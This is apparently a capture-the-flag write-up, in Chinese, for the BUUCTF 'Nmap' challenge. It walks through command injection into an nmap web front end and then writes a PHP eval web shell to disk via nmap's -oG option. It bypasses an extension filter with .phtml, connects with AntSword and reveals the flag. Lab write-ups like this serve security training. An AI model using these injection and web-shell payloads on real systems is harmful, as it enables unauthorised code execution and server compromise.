BUUCTF——Nmap
BUUCTF——Nmap
进入靶场
类似于一个nmap的网站
尝试一下功能
没什么用
看看数据包 既然跟IP相关
伪造一个XXF看看
拼接了一下没什么用 果然没这么简单
尝试一下命令注入
构造payload 127.0.0.1 | ls
应该有过滤 加了个\
直接构造个php木马上传试试
127.0.0.1 | ' <?php @eval($_POST["cmd"]);?> -oG shell.php '
应该被过滤了
也没有什么提示 盲猜是后缀名 mini绕过试试
双写、php3都试过了 最后phtml成功了
127.0.0.1 | ' <?= @eval($_POST["cmd"]);?> -oG shell.phtml '
拼接访问一下成功上传
用蚁剑连接看看
成功连接
接下来就慢慢找flag
在根目录下找到flag
flag{aade295d-204f-476f-91ee-299a5fa993a2}
下播!!!!!